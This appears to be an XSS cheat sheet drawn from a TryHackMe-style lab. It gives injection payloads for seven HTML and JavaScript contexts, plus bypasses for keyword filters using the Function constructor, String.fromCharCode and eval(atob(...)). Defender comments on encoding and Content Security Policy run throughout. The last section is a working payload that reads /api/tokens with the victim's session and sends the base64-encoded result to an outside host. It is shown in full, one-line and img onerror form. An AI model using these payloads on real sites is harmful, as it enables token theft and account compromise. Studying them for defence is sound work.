
Cross-site scripting (XSS)

injection point 1

<!-- Context: the untrusted {name} value is written as the content of an HTML element. -->
<!-- Template: -->
<div>
{name}
</div>
<!-- Submitted value: -->
<script>alert(1)</script>
<!-- Rendered result: the value is parsed as markup, so the script element executes.
     Fix: HTML-encode the value (& < > " ') at the point where it is written into element content. -->
<div>
<script>alert(1)</script>
</div>

injection point 2

<!-- Context: {name} is written inside a heading element. The three lines are the
     template, the submitted value and the rendered result. -->
<h2> {name} </h2>
<!-- The value closes the heading itself and reopens one at the end, so the leftover
     closing tag from the template still pairs up. -->
michal</h2><script>alert('THM')</script><h2>
<!-- Same root cause as plain element content: the value is emitted unencoded.
     With < and > HTML-encoded, the closing tag in the value is never recognised as a tag. -->
<h2> michal</h2><script>alert('THM')</script><h2> </h2>

injection point 3

<!-- Context: {name} is written inside a double-quoted attribute value. -->
<input value="{name}">
<!-- The double quote in the value ends the attribute and the > ends the input tag;
     the trailing img id= opening absorbs the quote and bracket left over from the template. -->
michal"><script>alert('THM')</script><img id="
<!-- Rendered result. Fix: attribute-encode the value (the double quote as &quot;, plus & < >)
     and keep every attribute value quoted, so the value cannot leave the attribute. -->
<input value="michal"><script>alert('THM')</script><img id="">

injection point 4

<!-- Context: {name} is written as the content of a textarea. Tags inside a textarea are
     shown as text rather than parsed, which is why the value below first closes the
     textarea before adding a script element. -->
<textarea> {name} </textarea>
<!-- Submitted value: closes the textarea, adds the script, reopens a textarea for the
     template's leftover closing tag. -->
michal</textarea><script>alert('THM')</script><textarea>
<!-- Rendered result. Fix: HTML-encode the value here as well; with < encoded, the
     closing textarea tag in the value stays literal text. -->
<textarea> michal</textarea><script>alert('THM')</script><textarea> </textarea>

injection point 5

<!-- Context: {name} is templated into a single-quoted JavaScript string literal inside
     an inline script, and that string is then assigned to innerHTML. -->
<script>
document.getElementsByClassName('name')[0].innerHTML='{name}';
</script>
<!-- Submitted value: the single quote ends the string literal, the statement after it
     runs as code, and the trailing // turns the template's leftover quote into a comment. -->
michal'; alert('THM'); //
<!-- Rendered result. This is a JavaScript string context, so it needs JavaScript string
     escaping rather than HTML encoding; the more robust fix is not to template user data
     into script source at all (pass it as data and read it from the DOM). The innerHTML
     assignment is a second HTML sink for the same value; textContent avoids it. -->
<script>
document.getElementsByClassName('name')[0].innerHTML='michal'; alert('THM'); //';
</script>

injection point 6

<!-- Context: a greeting that echoes the name. Baseline with a benign value: -->
<h2>Hello, michal</h2>

<!-- First pair (input, then output): the output has lost the script tags, which suggests
     the application deletes those tag strings from the value. Presumably a string-removal
     filter; confirm against the application. -->
<h2>Hello, <script>alert(1)</script></h2>
<h2>Hello, alert(1)</h2>

<!-- Second pair (input, then output): the tag string is nested inside itself, so a single
     removal pass leaves an intact tag behind. Deleting substrings is not a substitute for
     output encoding; encode the value for the HTML context instead of trying to strip it. -->
<h2>Hello, <scr<script>ipt>alert(1)</scr<script>ipt></h2>
<h2>Hello, <script>alert(1)</script></h2>

injection point 7

<!-- Context: {name} is written into the quoted src attribute of an img element. -->
<img src="{name}">
<!-- Submitted value: a loadable image path, then a double quote that ends src, an onload
     event-handler attribute, and an id= opening that absorbs the template's closing quote.
     No script element is involved, so tag-based filtering does not apply here.
     Fix: attribute-encode the value and validate it against the set of URLs or paths the
     application actually expects for images. -->
/images/cat.jpg" onload="alert('THM')" id="

Example 1


// Each group below assumes an input filter that rejects the listed keywords.
// Every group shows the call once with the code as a plain string and once with the
// string built by String.fromCharCode; the character codes spell alert('XSS'), so the
// rejected keyword never appears literally in the submitted text.
// Takeaway for defenders: keyword blocklists on input do not hold, because code can be
// assembled from strings at runtime. Output encoding at the sink, plus a Content Security
// Policy without 'unsafe-eval' (which blocks eval and the Function constructor), addresses
// the whole family rather than individual keywords.

// allowed - eval, disallowed - alert

eval('alert(`XSS`)')

eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))
// allowed - Function, disallowed - eval, alert

new Function('alert(`XSS`)')()

new Function(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()
// allowed - Function, disallowed - eval, alert, new
// Function called without `new` still constructs a function.

Function('alert(`XSS`)')()

Function(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()
// allowed - Function, disallowed - eval, alert, new
// NOTE(review): the next line uses `new`, which this heading lists as disallowed;
// presumably it is kept as the blocked baseline for comparison. Confirm with the author.

new Function('alert(`XSS`)')()

Function.call({}, 'alert(`XSS`)')()

Function.call({}, String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()
// allowed - Function, disallowed - eval, alert, new, {}
// NOTE(review): as above, the `new Function` line is presumably the blocked baseline.

new Function('alert(`XSS`)')()

Function.call(this, 'alert(`XSS`)')()

Function.call(this, String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()

Example 2


<!-- An img whose src does not load as an image, with the script carried in the inline
     onerror handler. No script element is present, so filters that only look for script
     tags miss it. A Content Security Policy that disallows inline script (no
     'unsafe-inline') stops inline event handlers such as this one. -->
<img src='#' onerror='alert(1)' />
<!-- Same handler with the code wrapped in an immediately invoked function expression. -->
<img src='#' onerror='(function(){alert(1);return false;})();return false;' />
// Script body: a same-origin GET to /api/tokens whose response text is shown in an alert.
// Because the request is issued from the page's own origin, the browser sends it with the
// user's session; anything the page's own script can read from the API, injected script
// can read too. What /api/tokens returns is not shown on this page.
xhttp = new XMLHttpRequest(); 
xhttp.onload = function(){alert(this.responseText)}; xhttp.open('GET','/api/tokens');  
xhttp.send();
// Wrapper: the script is base64-encoded and decoded with atob before eval, so none of its
// keywords appear literally in the submitted text. The three lines differ only in the quote
// character around the placeholder, to fit whatever quoting surrounds the injection.
// Detection: an eval(atob( sequence in request parameters or stored content is a strong
// indicator; a CSP without 'unsafe-eval' blocks the eval call itself.
eval(atob(".................."));
eval(atob('..................'));
eval(atob(`..................`));
<!-- Combined form: the inline onerror handler carries eval(atob(...)), and the base64
     string decodes to the three-line XMLHttpRequest script that reads /api/tokens.
     Backticks are used inside the handler so the attribute's single quotes stay intact.
     Mitigation is unchanged: encode the value for its HTML context, and use a CSP that
     disallows inline handlers and eval. -->
<img src=0 onerror='eval(atob(`eGh0dHAgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsgCnhodHRwLm9ubG9hZCA9IGZ1bmN0aW9uKCl7YWxlcnQodGhpcy5yZXNwb25zZVRleHQpfTsgeGh0dHAub3BlbignR0VUJywnL2FwaS90b2tlbnMnKTsgIAp4aHR0cC5zZW5kKCk7`))'/>

Example 3


// Two chained requests: `a` reads /api/tokens on the page's own origin, and when it loads,
// `b` sends the base64-encoded response text to a different host as a URL query string.
// Defender notes:
//  - A Content Security Policy whose connect-src is limited to the application's own origin
//    blocks request `b`, which is the step that moves data off the site.
//  - In proxy or egress logs, request `b` appears as a GET to an external host with a long
//    base64 query string.
//  - Request `a` carries a custom `Hacker` header; it is only visible server-side if request
//    headers are logged.
a = new XMLHttpRequest(); 
a.onload = function(){
    b = new XMLHttpRequest();
    b.open('GET','//michalszalkowski.com?'+btoa(this.responseText)); 
    b.send();
}; 
a.open('GET','/api/tokens');
a.setRequestHeader('Hacker', 'Szalek');
a.send();
// The same script on one line, with backticks instead of quotes so that it can sit inside
// a quoted HTML attribute.
(a=new XMLHttpRequest).onload=function(){(b=new XMLHttpRequest).open(`GET`,`//michalszalkowski.com?`+btoa(this.responseText)),b.send()},a.open(`GET`,`/api/tokens`),a.setRequestHeader(`Hacker`,`Szalek`),a.send()
<!-- The one-line script placed in an inline onerror handler. Both layers of defence apply:
     encoding the injected value for its HTML context prevents the img element from being
     created, and a CSP without 'unsafe-inline' and with a restrictive connect-src blocks the
     handler and the cross-origin request respectively. -->
<img src=0 onerror='(a=new XMLHttpRequest).onload=function(){(b=new XMLHttpRequest).open(`GET`,`//michalszalkowski.com?`+btoa(this.responseText)),b.send()},a.open(`GET`,`/api/tokens`),a.setRequestHeader(`Hacker`,`Szalek`),a.send()'/>